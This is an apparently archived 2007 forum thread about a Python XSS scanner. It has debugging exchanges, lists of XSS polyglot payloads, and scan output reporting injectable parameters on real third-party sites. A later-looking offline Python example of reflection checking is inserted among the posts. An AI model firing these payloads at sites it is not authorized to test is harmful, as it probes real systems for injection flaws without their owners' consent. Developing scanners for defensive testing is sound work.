Greetings , XSSscanner
Posted by: d3hydr8
Date: June 01, 2007 10:45AM

I was searching for an XSS scanner to compare to mine and get some feedback, and it led me here. I posted my script in a blog from Aug 2006 and figured it would never get seen, so I decided to post it here. Obviously I'm not an XSS wizard, but this works by checking HTTP responses and "source" searching. Any feedback would be great; I have added a few new options. Read the code heading/options for the details.

Link:
http://www.darkc0de.com/scanners/XSSscan.py | XSSscan.py



Edited 2 time(s). Last edit at 07/30/2007 05:41PM by d3hydr8.

Re: Greetings , XSSscanner
Posted by: WhiteAcid
Date: June 01, 2007 11:03AM

Welcome to the forums.
I ran your code but couldn't get it to work.
Here's the code I ran it on:
<?php echo @$_GET['x']; ?>
<a href="?x=<script>alert(1)</script>">I'm vuln</a>
Here's the output:
p$ ./XSSscan.py -site 127.0.0.1/xss.php

d3hydr8[at]gmail[dot]com XSS Scanner v1.1
-----------------------------------------------

[+] XSS_scan Loaded
[+] Verbose Mode Off
[+] Alert: D3HYDR8%2D0wNz%2DY0U
[+] Site: 127.0.0.1/xss.php
[+] Started: Fri Jun 1 17:02:26 2007

---------------------------------------------
[+] Searching: 127.0.0.1/xss.php
[+] Variables: 1 | Actions: 0 | Fields: 0
-----------------------------------------------------------------


[+] Potential XSS found: 0


[-] Done - Fri Jun 1 17:02:32 2007
Here's the apache logs:
127.0.0.1 - - [01/Jun/2007:17:02:29 +0100] "GET /xss.php HTTP/1.1" 200 52 "-" "Python-urllib/2.5"
127.0.0.1 - - [01/Jun/2007:17:02:29 +0100] "GET /xss.php/?x=%22%3E%3Cscript%3Ealert%28%27D3HYDR8%2D0wNz%2DY0U%27%29%3C%2Fscript%3E HTTP/1.1" 200 96 "-" "-"
127.0.0.1 - - [01/Jun/2007:17:02:29 +0100] "GET /xss.php/?x=%22%3E%3Cscript%3Ealert%28%27D3HYDR8%2D0wNz%2DY0U%27%29%3C%2Fscript%3E HTTP/1.1" 200 96 "-" "Python-urllib/2.5"

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: Greetings , XSSscanner
Posted by: d3hydr8
Date: June 01, 2007 11:25AM

OK, I found the problem; go upload it again and test it out. .replace("%2D","-") fixes it.

Re: Greetings , XSSscanner
Posted by: WhiteAcid
Date: June 01, 2007 12:13PM

I know this isn't the right section for a discussion about this tool. But another bug:
$ ./XSSscan.py -site wikkawiki.org/UserSettings gives zero XSSes found when here's a PoC for an XSS on that page: http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://wikkawiki.org/UserSettings&name=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&action=login

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: Greetings , XSSscanner
Posted by: d3hydr8
Date: June 01, 2007 12:30PM

I don't see the bug; where's the XSS in that site? The PoC doesn't show one. I know it works, try another site.
Here's an example of it working that I just ran.

d3hydr8@linuxbox:~> python xxsscan_test.py -s http://alioth.debian.org/forum/forum.php

d3hydr8[at]gmail[dot]com XSS Scanner v1.1
-----------------------------------------------

[+] XSS_scan Loaded
[+] Verbose Mode Off
[+] Alert: D3HYDR8%2D0wNz%2DY0U
[+] Site: http://alioth.debian.org/forum/forum.php
[+] Started: Sat Jun 2 13:31:41 2007

---------------------------------------------
[+] Searching: alioth.debian.org/forum/forum.php
[+] Variables: 0 | Actions: 1 | Fields: 3

[!] XSS: alioth.debian.org/forum/?words=%22%3E%3Cscript%3Ealert%28%27D3HYDR8%2D0wNz%2DY0U%27%29%3C%2Fscript%3E
[+] Response: 200 OK
[+] Collecting Emails: alioth.debian.org

[!] XSS: alioth.debian.org/?words=%22%3E%3Cscript%3Ealert%28%27D3HYDR8%2D0wNz%2DY0U%27%29%3C%2Fscript%3E
[+] Response: 200 OK

[!] XSS: alioth.debian.org/forum/forum.php/?words=%22%3E%3Cscript%3Ealert%28%27D3HYDR8%2D0wNz%2DY0U%27%29%3C%2Fscript%3E
[+] Response: 200 OK

[!] XSS: alioth.debian.org/search/?words=%22%3E%3Cscript%3Ealert%28%27D3HYDR8%2D0wNz%2DY0U%27%29%3C%2Fscript%3E
[+] Response: 200 OK
-----------------------------------------------------------------


[+] Potential XSS found: 4


[1] alioth.debian.org/search/?words=%22%3E%3Cscript%3Ealert%28%27D3HYDR8%2D0wNz%2DY0U%27%29%3C%2Fscript%3E

[2] alioth.debian.org/forum/?words=%22%3E%3Cscript%3Ealert%28%27D3HYDR8%2D0wNz%2DY0U%27%29%3C%2Fscript%3E

[3] alioth.debian.org/forum/forum.php/?words=%22%3E%3Cscript%3Ealert%28%27D3HYDR8%2D0wNz%2DY0U%27%29%3C%2Fscript%3E

[4] alioth.debian.org/?words=%22%3E%3Cscript%3Ealert%28%27D3HYDR8%2D0wNz%2DY0U%27%29%3C%2Fscript%3E

[-] Done - Sat Jun 2 13:31:58 2007

Re: Greetings , XSSscanner
Posted by: WhiteAcid
Date: June 01, 2007 12:44PM

Go to the PoC and hit the submit button. I used that page to create a dynamic form as the vulnerable page needs you to submit the stuff via POST.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: Greetings , XSSscanner
Posted by: d3hydr8
Date: June 01, 2007 03:34PM

Is there any way this can be moved to a better section on the forum?

Re: Greetings , XSSscanner
Posted by: WhiteAcid
Date: June 01, 2007 03:46PM

rsnake|id: could one of you move the appropriate posts here to the projects section please?

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: Greetings , XSSscanner
Posted by: id
Date: June 01, 2007 06:42PM

moved

-id

Re: Greetings , XSSscanner
Posted by: klaus
Date: June 01, 2007 08:50PM

d3hydr8, can you share your wordlists? (server gives not found/not auth)
http://darkcode.ath.cx/w0rdlists/wordlists.html

Edited: Got it. It's just the old packetstorm files. Thanks anyway.



Edited 1 time(s). Last edit at 06/01/2007 08:56PM by klaus.

Re: Greetings , XSSscanner
Posted by: d3hydr8
Date: June 02, 2007 08:53AM

They still will work, until people stop using words for passwords :P I haven't updated that section in a long time.

Re: Greetings , XSSscanner
Posted by: Anonymous User
Date: June 03, 2007 06:44AM

Hi d3hydr8.

Nice tool, but I think one vector is a little bit too few - why not store the payload in an array rather than in a single string? You could iterate through your payload array for any request which is fired to avoid overseeing LHF.

I created an almost similar approach for an XSS scanner - but in JavaScript. The tool isn't maintained at the moment because I don't have time for that, but if you want you can use the payload.

http://lfh.heideri.ch/lib/LFH.lib.LFH.js

/**
objXSSScanner.arrPayload 	= [
'<script>alert(String.fromCharCode(88,83,83));</script>',
'\';alert(String.fromCharCode(88,83,83))//\\\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{<script>alert(\'xss\')</script>}',
'\'\';!--"<script>alert(String.fromCharCode(88,83,83));</script>=&{()}',
'");alert(String.fromCharCode(88,83,83));//',
'"><script>alert(\'xss\');</script>',
';}alert("XSS");{',
'"+alert("xss")+"',
'c%00""<script>alert(String.fromCharCode(88,83,83));</script>'
];
**/

Re: Greetings , XSSscanner
Posted by: d3hydr8
Date: June 03, 2007 10:06AM

That's a good idea; in case it's not vulnerable to my

xss = "%22%3E%3Cscript%3Ealert%28%27D3HYDR8%2D0wNz%2DY0U%27%29%3C%2Fscript%3E"

it might be to other types of attacks. I will work on that and post back. I also want to add proxy support. Thanks for the feedback.
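
Two points from the discussion above are easy to get wrong in a reflection check: the "%2D" bug WhiteAcid hit (the scanner searched the response for the URL-encoded marker, but the server decodes the query before echoing it, so the search never matched) and the suggestion to iterate over a list of payloads instead of one string. The following is an added example, my own Python 3 code and not d3hydr8's XSSscan.py or the LFH library. It simulates WhiteAcid's two-line test page in-process instead of doing HTTP, so it runs offline; the payload list is constructed from the kinds of vectors posted in this thread, the canary is the scanner's marker after URL decoding, and `vulnerable_page`, `escaped_page`, `check_encoded`, `check_decoded` and `scan` are names I chose. It doubles as a regression check that output encoding is actually applied: the hardened page returns no hits.

```python
import html
from urllib.parse import parse_qs, quote, unquote

# The scanner's marker as the server sees it after URL decoding: the request carries
# "D3HYDR8%2D0wNz%2DY0U", and the server turns %2D back into "-" before echoing.
CANARY = "D3HYDR8-0wNz-Y0U"

# Constructed payload list (the "array rather than a single string" idea). Every entry
# carries the canary, so a hit is recognisable no matter which payload landed.
PAYLOADS = [
    "\"><script>alert('%s')</script>" % CANARY,          # breaks out of an attribute / plain HTML
    "';alert('%s')//" % CANARY,                          # breaks out of a single-quoted JS string
    "</textarea><script>alert('%s')</script>" % CANARY,  # breaks out of a textarea
]


def vulnerable_page(query):
    """Stand-in for WhiteAcid's test page, <?php echo @$_GET['x']; ?>: echoes x unencoded."""
    x = parse_qs(query, keep_blank_values=True).get("x", [""])[0]
    return "<html><body>%s<a href=\"?x=\">I'm vuln</a></body></html>" % x


def escaped_page(query):
    """The same page with HTML output encoding applied, i.e. what fixing the finding looks like."""
    x = parse_qs(query, keep_blank_values=True).get("x", [""])[0]
    return "<html><body>%s<a href=\"?x=\">I'm vuln</a></body></html>" % html.escape(x, quote=True)


def check_encoded(body, encoded_payload):
    """The v1.1-style check: look for the URL-encoded string in the response body.
    It never matches, because the server decoded %2D, %3C, %3E, ... before echoing."""
    return encoded_payload in body


def check_decoded(body, encoded_payload):
    """The fixed check: compare against the decoded payload, the text a browser would parse."""
    return unquote(encoded_payload) in body


def scan(page, param, payloads, check):
    """Send each payload as a GET parameter (the thread's scanner only did GET at this point)
    and return the payloads that came back verbatim, i.e. unencoded, in the response."""
    hits = []
    for payload in payloads:
        encoded = quote(payload, safe="")          # what goes on the wire
        body = page("%s=%s" % (param, encoded))    # stand-in for the HTTP round trip
        if check(body, encoded):
            hits.append(payload)
    return hits


if __name__ == "__main__":
    print("v1.1 check, vulnerable page:", scan(vulnerable_page, "x", PAYLOADS, check_encoded))
    print("fixed check, vulnerable page:", scan(vulnerable_page, "x", PAYLOADS, check_decoded))
    print("fixed check, escaped page:   ", scan(escaped_page, "x", PAYLOADS, check_decoded))
```

Run as a script it prints an empty list for the v1.1-style check even against the unescaped page (the marker is searched for in its encoded form), all three payloads for the fixed check against that page, and an empty list once `html.escape` is in the output path. Comparing against the decoded form is the general version of the `.replace("%2D","-")` fix: it covers every percent-escape the server undoes, not only the hyphen.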

Re: Greetings , XSSscanner
Posted by: Anonymous User
Date: June 03, 2007 10:32AM

You're welcome - you can also use the stuff from the following file to get better coverage and detection rates:

http://mario.heideri.ch/xss.xml

Re: Greetings , XSSscanner
Posted by: sunday
Date: June 03, 2007 04:27PM

I also use an XSS scanner (or, as I call it, my xss can); it's not as full-featured as yours, but it gets the job done.

Source: http://coco.cd.chalmers.se/ola/xss/xsscan.py
Usage: http://coco.cd.chalmers.se/ola/xss/xsscan

You will need the libxml2dom library to run it: http://www.boddie.org.uk/python/libxml2dom.html

#&

Updated Version 1.2
Posted by: d3hydr8
Date: June 05, 2007 11:17AM

This is my update for my XSSscanner. I've added the use of more XSS payloads, fixed an exception and added more runtime feedback for the user, along with fixing a few.

http://www.darkc0de.com/scanners/XSSscan.py | XSSscanner



Edited 1 time(s). Last edit at 07/30/2007 05:41PM by d3hydr8.

Re: Updated Version 1.2
Posted by: Anonymous User
Date: June 05, 2007 01:43PM

Hi!

Looking good - although ( just a cosmetic issue ) it would be cool to have the single payload elements separated by newlines - enhances readability of the source.

Greetings,
.mario

Re: Greetings , XSSscanner
Posted by: d3hydr8
Date: June 05, 2007 04:10PM

And would make it easier for someone to add more or subtract, depending on how versatile they want it. Good suggestion, I will change that when I get home. Thanks

Re: Greetings , XSSscanner
Posted by: d3hydr8
Date: June 05, 2007 11:02PM

Alright I have fixed that and fixed another syntax error with writing to a file.

http://www.darkc0de.com/scanners/XSSscan.py | XSS Scanner



Edited 1 time(s). Last edit at 07/30/2007 05:42PM by d3hydr8.

Re: Greetings , XSSscanner
Posted by: Anonymous User
Date: June 06, 2007 01:40AM

Hi!

I would definitely recommend you to use those vectors too - they break HTML, comments and JavaScript, each of them double- and single-quoted. The second version also breaks title tags (works perfectly on dirty-coded WordPress templates). Also, I am missing a vector to break textareas.

';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function

';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}");}

</textarea><script>alert(1)</script>

Greetings,
.mario

Re: Greetings , XSSscanner
Posted by: d3hydr8
Date: June 06, 2007 11:30AM

Update: OK, I have added those payloads and made some more changes:

added HTTPS support, more XSS payloads and the ability to change the port; fixed some user input problems; exiting without error messages on Ctrl-C (KeyboardInterrupt).

http://www.darkc0de.com/scanners/XSSscan.py | XSS Scanner



Edited 1 time(s). Last edit at 07/30/2007 05:42PM by d3hydr8.

Re: Greetings , XSSscanner
Posted by: hackathology
Date: July 25, 2007 03:29AM

Downloaded 1.3; however, I have not tested it yet. Thanks.

http://hackathology.blogspot.com
